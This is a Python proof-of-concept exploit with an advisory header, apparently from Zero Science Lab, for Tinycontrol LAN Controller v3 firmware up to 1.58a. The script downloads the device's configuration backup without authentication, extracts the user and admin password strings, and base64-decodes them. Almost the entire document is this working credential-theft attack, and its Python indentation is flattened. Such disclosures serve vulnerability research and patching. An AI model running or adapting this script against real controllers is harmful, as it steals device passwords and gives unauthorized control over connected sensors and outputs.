Tinycontrol LAN Controller 3 Remote Credential Extraction

`#!/usr/bin/env python  
#  
#  
# Tinycontrol LAN Controller v3 (LK3) Remote Credentials Extraction PoC  
#  
#  
# Vendor: Tinycontrol  
# Product web page: https://www.tinycontrol.pl  
# Affected version: <=1.58a, HW 3.8  
#  
# Summary: Lan Controller is a very universal  
# device that allows you to connect many different  
# sensors and remotely view their readings and  
# remotely control various types of outputs.  
# It is also possible to combine both functions  
# into an automatic if -> this with a calendar  
# when -> then. The device provides a user interface  
# in the form of a web page. The website presents  
# readings of various types of sensors: temperature,  
# humidity, pressure, voltage, current. It also  
# allows you to configure the device, incl. event  
# setting and controlling up to 10 outputs. Thanks  
# to the support of many protocols, it is possible  
# to operate from smartphones, collect and observ  
# the results on the server, as well as cooperation  
# with other I/O systems based on TCP/IP and Modbus.  
#  
# Desc: An unauthenticated attacker can retrieve the  
# controller's configuration backup file and extract  
# sensitive information that can allow him/her/them  
# to bypass security controls and penetrate the system  
# in its entirety.  
#  
# Tested on: lwIP  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2023-5786  
# Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php  
#  
#  
# 18.08.2023  
#  
#  
  
  
import subprocess  
import requests  
import base64  
import sys  
  
binb = "lk3_settings.bin"  
outf = "lk3_settings.enc"  
bpatt = "0upassword"  
epatt = "pool.ntp.org"  
startf = False  
endf = False  
extral = []  
  
print("""  
O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O  
| |  
| Tinycontrol LK3 1.58 Settings DL |  
| ZSL-2023-5786 |  
| 2023 (c) Zero Science Lab |  
| |  
|`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'|  
| |  
""")  
  
if len(sys.argv) != 2:  
print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0]))  
exit(-0)  
else:  
rhost=sys.argv[1]  
if not "http" in rhost:  
rhost="http://{}".format(rhost)  
  
try:  
resp = requests.get(rhost + "/" + binb)  
if resp.status_code == 200:  
with open(outf, 'wb') as f:  
f.write(resp.content)  
print(f"[*] Got data as {outf}")  
else:  
print(f"[!] Backup failed. Status code: {resp.status_code}")  
except Exception as e:  
print("[!] Error:", str(e))  
exit(-1)  
  
binf = outf  
sout = subprocess.check_output(["strings", binf], universal_newlines = True)  
linea = sout.split("\n")  
  
for thricer in linea:  
if bpatt in thricer:  
startf = True  
elif epatt in thricer:  
endf = True  
elif startf and not endf:  
extral.append(thricer)  
  
if len(extral) >= 4:  
userl = extral[1].strip()  
adminl = extral[3].strip()  
try:  
decuser = base64.b64decode(userl).decode("utf-8")  
decadmin = base64.b64decode(adminl).decode("utf-8")  
print("[+] User password:", decuser)  
print("[+] Admin password:", decadmin)  
except Exception as e:  
print("[!] Error decoding:", str(e))  
else:  
print("[!] Regex failed.")  
exit(-2)  
`